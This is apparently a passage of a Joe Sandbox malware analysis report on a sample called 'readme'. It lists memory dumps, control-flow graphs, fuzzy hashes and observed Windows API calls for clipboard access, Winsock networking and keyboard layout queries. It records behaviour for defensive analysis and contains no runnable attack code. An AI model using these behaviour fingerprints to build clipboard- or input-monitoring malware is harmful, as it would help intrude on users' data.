                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                                                                          • API String ID: 0-3677570488
                                                                                                                                                                                                          • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                          • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 689 4d9ab0-4d9ab7 690 4d9abd-4d9ac0 689->690 691 4d9c1c-4d9c1d 689->691 690->691 692 4d9ac6-4d9ad4 690->692 693 4d9ada-4d9aeb call 4b8000 692->693 694 4d9ba3-4d9ba5 692->694 699 4d9c19-4d9c1b 693->699 700 4d9af1-4d9b14 call 421380 GlobalAlloc 693->700 696 4d9ba8-4d9bad 694->696 696->696 698 4d9baf-4d9bc2 GlobalAlloc 696->698 698->699 701 4d9bc4-4d9bcb GlobalLock 698->701 699->691 707 4d9b2e-4d9b3f call 52b380 700->707 708 4d9b16-4d9b28 GlobalLock call 4b81c0 GlobalUnlock 700->708 702 4d9bd0-4d9bd8 701->702 702->702 704 4d9bda-4d9bdb GlobalUnlock 702->704 706 4d9be1-4d9be3 704->706 710 4d9be9-4d9bf3 OpenClipboard 706->710 711 4d9be5-4d9be7 706->711 716 4d9b41-4d9b6b WideCharToMultiByte GlobalAlloc 707->716 717 4d9b90-4d9ba1 call 439d00 707->717 708->707 710->699 714 4d9bf5-4d9c03 EmptyClipboard 710->714 711->699 711->710 718 4d9c0a-4d9c0c 714->718 719 4d9c05-4d9c08 SetClipboardData 714->719 720 4d9b6d-4d9b70 GlobalLock 716->720 721 4d9b87-4d9b8d call 439d00 716->721 717->706 722 4d9c0e-4d9c11 SetClipboardData 718->722 723 4d9c13 CloseClipboard 718->723 719->718 725 4d9b76-4d9b7e 720->725 721->717 722->723 723->699 725->725 728 4d9b80-4d9b81 GlobalUnlock 725->728 728->721
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3392129136-0
                                                                                                                                                                                                          • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                          • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 778 416621-416631 779 416637-41663c 778->779 780 416b2e-416b35 778->780 779->780 781 416642-416651 call 49ad90 779->781 784 416653 781->784 785 416655-41665b 781->785 784->785 786 41666d-41667a call 4848b0 785->786 787 41665d-41666b call 4848b0 785->787 792 41667e-416682 786->792 787->792 793 416684-416688 792->793 794 4166bc-4166c1 792->794 793->794 797 41668a-416692 793->797 795 4166c3 794->795 796 4166c5-4166c9 794->796 795->796 799 41686a-41687b call 40cef0 796->799 800 4166cf-4166e7 call 463050 call 411870 796->800 797->794 798 416694-41669d 797->798 798->794 801 41669f-4166ac 798->801 809 4168a5-4168ae 799->809 810 41687d-416881 799->810 800->799 818 4166ed-4167be call 4c9000 call 40ceb0 call 4900f0 call 4c9000 call 40ceb0 call 4900f0 call 4c9000 call 40ceb0 call 4900f0 call 4c9000 call 40ceb0 call 4900f0 800->818 804 4166ba 801->804 805 4166ae-4166b2 801->805 804->794 805->804 808 4166b4-4166b8 805->808 808->794 808->804 813 4168b0-4168b5 809->813 814 4168c5-4168c9 809->814 810->809 812 416883-41688b 810->812 812->809 816 41688d-416895 812->816 813->814 817 4168b7-4168c0 call 40f880 813->817 819 416b0f-416b2b call 439d00 814->819 820 4168cf-4168d9 814->820 816->809 821 416897-4168a0 call 40f880 816->821 817->814 916 4167c0-4167d5 call 4c9000 818->916 917 4167d7-4167e7 call 4c9000 818->917 819->780 825 4168f9-41690e call 415860 820->825 826 4168db-4168f3 call 463050 call 411870 820->826 821->809 837 416af2-416b0e call 439d00 825->837 838 416914-416928 825->838 826->825 826->837 842 416940-416950 838->842 843 41692a-41693b call 4900f0 838->843 847 416952-416963 call 4900f0 842->847 848 416968-416978 842->848 858 416ab6-416ac8 call 4c9030 843->858 847->858 849 416990-4169a0 848->849 850 41697a-41698b call 4900f0 848->850 855 4169a2-4169b3 call 4900f0 849->855 856 4169b8-4169c8 849->856 850->858 855->858 863 4169e0-4169f0 856->863 864 4169ca-4169db call 4900f0 856->864 876 416ad7-416aec call 415860 858->876 877 416aca-416ad2 call 4900f0 858->877 869 4169f2-416a03 call 4900f0 863->869 870 416a08-416a18 863->870 864->858 869->858 870->858 872 416a1e-416a3b call 4900f0 call 48c060 870->872 890 416a3d-416a6d call 463070 call 490dd0 call 48c060 872->890 891 416a6f-416a79 call 4023b0 872->891 876->837 876->838 877->876 890->858 890->891 891->858 901 416a7b-416a86 call 411870 891->901 901->858 908 416a88-416a9e call 48c020 call 495630 901->908 908->858 921 416aa0-416ab3 call 4900f0 call 439d00 908->921 925 4167ec-416812 call 40ceb0 call 4900f0 916->925 917->925 921->858 933 416814-416827 call 495630 925->933 934 41683f-416852 call 495630 925->934 933->934 939 416829-41683c call 4900f0 call 439d00 933->939 934->799 940 416854-416867 call 4900f0 call 439d00 934->940 939->934 940->799
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: COMM$TALB$TCON$TIT2$TPE1$TRCK$TYER$album$artist$comment$genre$songname$track$year
                                                                                                                                                                                                          • API String ID: 0-590896439
                                                                                                                                                                                                          • Opcode ID: 58e90cd763c27353f5f737474b6cde04d51412e2af52a5f89d8bdd9097ff8991
                                                                                                                                                                                                          • Instruction ID: 644f6fcce6cd6c0cf36f8c2a49984ad5006fbd26ddfeab9ab515d91a446fbcca
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58e90cd763c27353f5f737474b6cde04d51412e2af52a5f89d8bdd9097ff8991
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D1F471204240ABDB14EA55C892BBB77E9AF84304F05482EF64587382EF7DDC49C7AA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: _level$gfff$gfff$landscape$paperHeight$portrait$printAsBitmap$xMax$xMin$yMax$yMin
                                                                                                                                                                                                          • API String ID: 0-188115620
                                                                                                                                                                                                          • Opcode ID: dea08f720592daa481637ef8359b17615b2d3d0a0cce9d10a90a14ebba861c01
                                                                                                                                                                                                          • Instruction ID: 70ff334641663e0afb433915ac50cfd4971647fdd0d0ab24e810831b83e0dab3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dea08f720592daa481637ef8359b17615b2d3d0a0cce9d10a90a14ebba861c01
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C6290706047019FC714DF29D491AABB7E1FF88344F14896EF58A8B791DB38E884CB99
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                                                                          • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 464010812-0
                                                                                                                                                                                                          • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                          • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $K$gfff$gfff$gfff
                                                                                                                                                                                                          • API String ID: 0-1048959944
                                                                                                                                                                                                          • Opcode ID: d12f4ee0db7e837eeaddada9b02ab57d1ed414e4daef55ec7281e1621cc72c7d
                                                                                                                                                                                                          • Instruction ID: 9d2a5138eda07fb78ed16dc27847904d5eff4784a57d1f73a6c8b6feaa4118fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d12f4ee0db7e837eeaddada9b02ab57d1ed414e4daef55ec7281e1621cc72c7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91426DB06083558FC728CF19D590A6BBBE5BFC8304F44895EF88A8B352D738D945CB96
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004C9674
                                                                                                                                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 004C967B
                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,?,?,004D9D12,?,000000FF), ref: 004C9693
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentInfoKeyboardLayoutLocaleThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4094687451-0
                                                                                                                                                                                                          • Opcode ID: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                                                                          • Instruction ID: c18c3e67b2d418a81a9ed34cd04b46ff7c576915d0efad72319c368f8fc6f991
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9E0E57A6003107BD601EB68BC09FAB77F8AB54B01F408419FA44C2280E338D90897FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
